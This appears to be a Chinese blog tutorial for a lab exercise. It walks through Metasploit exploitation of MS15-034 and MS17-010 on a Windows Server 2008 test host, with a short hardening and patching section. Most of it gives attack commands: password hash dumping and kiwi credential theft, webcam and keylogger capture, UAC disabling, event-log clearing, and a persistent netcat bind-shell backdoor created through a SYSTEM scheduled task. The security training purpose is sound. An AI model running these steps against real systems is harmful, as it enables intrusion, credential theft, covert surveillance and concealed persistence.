-
网络安全: Kali Linux 使用 MSF 漏洞利用
目录
3. Kali Linux 使用 MSF 漏洞利用( ms15-034 )
6. Kali Linux 使用 MSF 漏洞验证 ( ms17-010)
7. Kali Linux 使用 MSF 漏洞利用( ms17-010 )
一、实验
1.环境
(1)主机
表1 主机
系统 版本 IP 备注 Kali Linux 2024.1 192.168.204.146(动态)
192.168.204.100(静态)
Windows server 2008 R2 192.168.204.150 Kali(2024.1)的目标主机 (2)查看Kali Linux (2024.1)系统版本
cat /etc/os-release
(3)查看Kali Linux (2024.1)系统IP地址
ip addr
(4) 查看Windows server 2008 IP 地址
ipconfig
(5)openvas查看报告
点击CVEs查看通用漏洞编号(cve-2015-1635)
2.POC验证与nmap扫描( ms15-034 )
(1)执行验证脚本
VULN 存在漏洞
python2 cve-2015-1635.poc
(2)进入MSF 控制台
msfconsole
(3)扫描网段
目标主机为192.168.204.150
db_nmap -sP 192.168.204.0/24
(4)扫描开放端口
db_nmap -sV 192.168.204.150
3. Kali Linux 使用 MSF 漏洞利用( ms15-034 )
(1) 搜索 ms15-034 脚本
search ms15-034
(2) 使⽤编号为 0 的脚本
use 0
(3) 设置⽬标主机
set rhosts 192.168.204.150
查看Windows server状态
(4)运⾏脚本
run
查看Windows server状态
4.Windows server 安全加固
(1)IIS管理器
(2)打开功能
(3)编辑功能设置
(4)关闭内核缓存
修改前:
修改后:
5.Windows server 安装补丁
(1)Windows 补丁查询
(2)搜索
KB3042553
(3)安装补丁
重启
(4)Kali Lnux (2024.1) 使用MSF运⾏脚本
run
(5)Windows server
保持正常
(6)POC验证
Patched 补丁已修复
python2 cve-2015-1635.poc
6. Kali Linux 使用 MSF 漏洞验证 ( ms17-010)
(1) 进入MSF 控制台
msfconsole
(2) 搜索 ms17-010 脚本
search ms17-010
(2) 使⽤编号为 0 的脚本
use 3
(3) 设置⽬标主机
set rhosts 192.168.204.150
查看Windows server状态
(4)运⾏脚本
run
7. Kali Linux 使用 MSF 漏洞利用( ms17-010 )
(1) 使⽤编号为 0 的脚本
use 0
(3) 设置⽬标主机
set rhosts 192.168.204.150
查看Windows server状态
(4)运⾏脚本
run
8. Kali Linux 进行 MSF 后渗透
(1)获取windows 服务器的密⽂密码
Administrator第3个冒号后内容为密码
hashdump
(2) 解密
第一种方式:
https://cmd5.com/
第二种方式:
MSF加载kiwi模块
(3)使用kiwi模块获取明⽂密码
加载 kiwi 模块
load kiwi
检测所有凭证
creds_all
(4)屏幕截图
screenshot
(5)屏幕共享
screenshare(6)监控摄像头
webcam_stream
(7)进程迁移
获取用户身份和进程列表
- getuid
- getpid
查找 explorer 进程 (2704)
ps -S explorer
迁移进程到 explorer
migrate 2704
再次获取用户身份( 具有 administrator ⾝份)
getuid
进程列表已切换
getpid
(8)执⾏键盘操作记录
run post/windows/capture/keylog_recorder
Windows server 新建文本文件
查看键盘操作记录
vim /root/.msf4/loot/20240306131129_default_192.168.204.150_host.windows.key_889524.txt结束 (CTRL + C)
(9)防⽕墙配置
进入 windows2008 的 cmd
消除乱码
chcp 65001
检查防火墙状态 (目前为关闭)
防火墙设置开启状态
netsh advfirewall set allprofiles state on
防火墙设置关闭状态
netsh advfirewall set allprofiles state off
防火墙添加指定端口并启用 (后门端口别名为backdoor)
netsh firewall add portopening tcp 444 backdoor enable all
查看
(10)UAC (用户账户控制设置)管理
查看
调整到最高
关闭
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f开启
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f(11)清除日志
查看日志
应用程序日志
安全日志
安装日志
系统日志
退出 win2008 cmd
exit
清除日志
clearev
查看日志
9. Kali Linux 使用 持久性后门( nc)
(1)查看后门程序(nc.exe)
ls /usr/share/windows-binaries(2)上传后⻔程序nc.exe 到Windows server
upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32
查看
(3)查看任务计划
WIN + R
taskschd.msc
查看
(4) 进入 cmd 命令⾏
cmd
(5)消除乱码
chcp 65001
(6)配置注册表开机⾃启
schtasks /create /tn "nc" /ru system /tr "c:\windows\system32\nc.exe -Ldp 444 -e cmd.exe" /sc onstart
查看
(7)重启
(8)查看进程
CTRL + SHIFT + ESC
(9)后门接入
nc 192.168.204.150 444
退出
exit
二、问题
1.CMD防火墙如何配置
(1)配置
- netsh:network shell ⽹络管理⼯具
- advfirewall:advanced firewall ⾼级防火墙
- set:设置
- allprofiles:all 所有的profiles 配置
- state:状态
- off:关闭
- on:开启
2.CMD注册表如何配置
(1)配置
- ADD 添加⼀个注册表项
- /v 创建键值
- /t 键值类型
- /d 键值的值 1开/0关
- /f 覆盖现有注册表项
3.CMD计划任务如何配置
(1)配置
- schtasks:scheduled tasks 计划任务
- /create:创建
- /tn: task name 任务名称
- /ru:run user 运⾏⽤户
- system:系统⽤户
- /tr:task run 任务执⾏的操作
- -Ldp:Listen and port 监听端⼝
- -e:execute 执⾏
- /sc:schedule 计划任务表示计划任务触发的时机
- onstart:开机
-
相关阅读:
【Python语言】字典的使用方法总结
树和二叉树练习题
最新1688商品列表接口JS逆向分析
java通过解密身份证计算年龄(精确到日)
虹科教您 | 如何选择超声波储罐液位传感器(一)
【Python自动化】定时自动采集,并发送微信告警通知,全流程案例讲解!
入侵检测——WebCrack
Elasticsearch的配置学习笔记
【Pytorch】torch. bmm()
PHP 安全漏洞:会话劫持、跨站点脚本、SQL 注入以及如何修复它们
- 原文地址:https://blog.csdn.net/cronaldo91/article/details/136499898